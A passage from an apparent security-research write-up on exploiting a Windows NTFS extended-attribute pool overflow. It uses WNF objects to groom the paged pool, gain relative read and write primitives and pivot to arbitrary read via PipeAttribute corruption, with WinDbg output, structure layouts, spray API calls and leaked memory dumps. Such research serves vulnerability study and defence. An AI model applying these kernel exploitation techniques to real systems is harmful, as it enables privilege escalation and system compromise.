bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk initially and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true, however, demonstrates that even with more restricted attacker constraints these can often be worked around and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that chunk size calculation will be, 0x12 + 0x10 = 0x22, with this then being rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facitily is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF related structures used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, then we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the argument Length is our v6 value 16 (the 0x10-byte header prepended).

Therefore, we have (0x10-bytes of _POOL_HEADER) header as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with data of a controlled size and data, and we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData in turn ends up free’ing our allocation.

Whilst researching this area, I was able to reuse the free’d chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists as in my case from empirical testing, then I did not seem to be hitting this after a large spray of Wnf chunks.

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data, itself and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize is to denote the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that the both the NTFS vulnerable chunk and the WNF chunk can be positioned with other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point its worth noting that the relative write has not really given us anything more than we had already with the NTFS overflow. However, as the data can be both read and written back using this technique then it opens up the ability to read data, modify certain parts of it and write it back.

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption lead to me trying to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is free’d using our controlled free, we can force the chunks address to be stored within the wrong lookaside list for the size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative write’s.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagramatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back after this minor Pipe Attribute detour and with the realisation that I could actually control the size of the vulnerable NTFS chunks. I started to investigate if it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur in, then the bounds checking within the ExpWnfWriteStateData would be successful.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore can end up with our desired memory layout with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
